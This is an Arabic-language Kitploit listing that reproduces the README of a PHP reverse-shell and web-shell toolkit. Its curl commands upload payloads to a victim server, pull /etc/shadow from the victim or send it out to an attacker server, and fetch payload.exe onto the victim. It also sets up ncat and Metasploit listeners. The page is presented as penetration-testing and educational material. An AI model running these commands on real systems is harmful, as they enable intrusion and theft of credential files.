Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
php-reverse-shell — صدفات PHP تعمل على أنظمة تشغيل Linux وmacOS وWindows. | Kitploit
أدوات/GitHubGitHub/ivan-sincek/php-reverse-shell
الاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد
GitHubivan-sincek/php-reverse-shell

php-reverse-shell

صدفات PHP تعمل على أنظمة تشغيل Linux وmacOS وWindows.

عرض المستودع
571160منذ 5 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PHP شيل عكسي

مجرد تحديث بسيط لسكربت الشيل العكسي الشهير بلغة PHP pentestmonkey/php-reverse-shell. كل الفضل للمؤلف الأصلي!

يعمل على نظامي Linux و macOS مع /bin/sh وعلى نظام Windows مع cmd.exe. سيكتشف السكربت نظام التشغيل الأساسي تلقائيًا.

يعمل مع كل من ncat و multi/handler.

تم اختباره على:

  • XAMPP لنظام Linux الإصدار v7.3.19 مع PHP v7.3.19 على Kali Linux الإصدار v2020.2 (64 بت)،
  • XAMPP لنظام OS X الإصدار v7.4.10 مع PHP v7.4.10 على macOS Catalina الإصدار v10.15.6 (64 بت)،
  • XAMPP لنظام Windows الإصدار v7.4.3 مع PHP v7.4.3 على Windows 10 Enterprise OS (64 بت)،
  • صورة Docker nouphet/docker-php4 مع PHP v4.4.0،
  • صورة Docker steeze/php52-nginx مع PHP v5.2.17.

لا تدعم أنابيب العمليات على نظام Windows العمليات غير المتزامنة، لذا لن تعمل stream_set_blocking() و stream_select() و feof() بشكل صحيح، لكنني وجدت حلًا بديلًا.

أُنجز لأغراض تعليمية. آمل أن يكون مفيدًا!

جدول المحتويات

  • الشيلات العكسية
  • شيلات الويب
  • سكربت رفع/تنزيل الملفات
    • الحالة 1: رفع السكربت إلى خادم الضحية
    • الحالة 2: رفع السكربت إلى خادمك
  • إعداد مستمع
  • الصور

الشيلات العكسية

/src/reverse/php_reverse_shell.php يتطلب PHP v5.0.0 أو أحدث.

/src/reverse/php_reverse_shell_older.php يتطلب PHP v4.3.0 أو أحدث.

غيّر عنوان IP ورقم المنفذ داخل السكربتات حسب الحاجة.

انسخ /src/reverse/php_reverse_shell.php إلى دليل جذر الويب على خادمك (مثل /opt/lampp/htdocs/ في XAMPP) أو ارفعه إلى خادم الويب الخاص بالهدف.

انتقل إلى الملف باستخدام متصفح الويب المفضل لديك.

شيلات الويب

تحقّق من شيل الويب PHP البسيط القائم على طلب HTTP POST.

تحقّق من شيل الويب PHP البسيط القائم على طلب HTTP GET. يجب عليك ترميز URL لأوامرك.

تحقّق من شيل الويب PHP البسيط v2 القائم على طلب HTTP GET. يجب عليك ترميز URL لأوامرك.

سكربت رفع/تنزيل الملفات

تحقّق من سكربت PHP البسيط لرفع/تنزيل الملفات القائم على طلب HTTP POST لرفع الملفات وطلب HTTP GET لتنزيلها.

عند تنزيل ملف، يجب عليك ترميز URL لمسار الملف.

اعتمادًا على إعدادات الخادم، قد لا يعمل تنزيل ملف عبر معامل طلب HTTP GET دائمًا؛ بدلًا من ذلك، سيتعين عليك تضمين مسار الملف يدويًا في السكربت.

الحالة 1: رفع السكربت إلى خادم الضحية

انتقل إلى السكربت على خادم الويب الخاص بالضحية باستخدام متصفح الويب المفضل لديك، أو استخدم cURL من جهازك.

ارفع ملفًا إلى دليل جذر الويب على الخادم من جهازك:

root@kitploit:~
curl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe

نزّل ملفًا من الخادم إلى جهازك:

root@kitploit:~
curl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow

إذا رفعت صلاحياتك الأولية داخل الشيل العكسي، فقد لا يمتلك هذا السكربت نفس صلاحيات الشيل. في هذه الحالة، لتنزيل ملف معين، قد تحتاج إلى نسخ الملف إلى دليل جذر الويب وتعيين أذونات القراءة اللازمة.

الحالة 2: رفع السكربت إلى خادمك

من الشيل العكسي PHP الخاص بك، نفّذ أوامر cURL التالية.

ارفع ملفًا من جهاز الضحية إلى دليل جذر الويب على خادمك:

root@kitploit:~
curl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow

نزّل ملفًا من دليل جذر الويب على خادمك إلى جهاز الضحية:

root@kitploit:~
curl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe

curl -skL -X GET https://my-server.com/payload.exe -o payload.exe

إعداد مستمع

لإعداد مستمع، افتح وحدة التحكم المفضلة لديك على Kali Linux ونفّذ أحد الأمثلة أدناه.

إعداد مستمع ncat:

root@kitploit:~
ncat -nvlp 9000

إعداد مستمع multi/handler:

root@kitploit:~
msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

الصور

Ncat

الشكل 1 - Ncat

تفريغ السكربت

الشكل 2 - تفريغ السكربت

تنزيل الأداة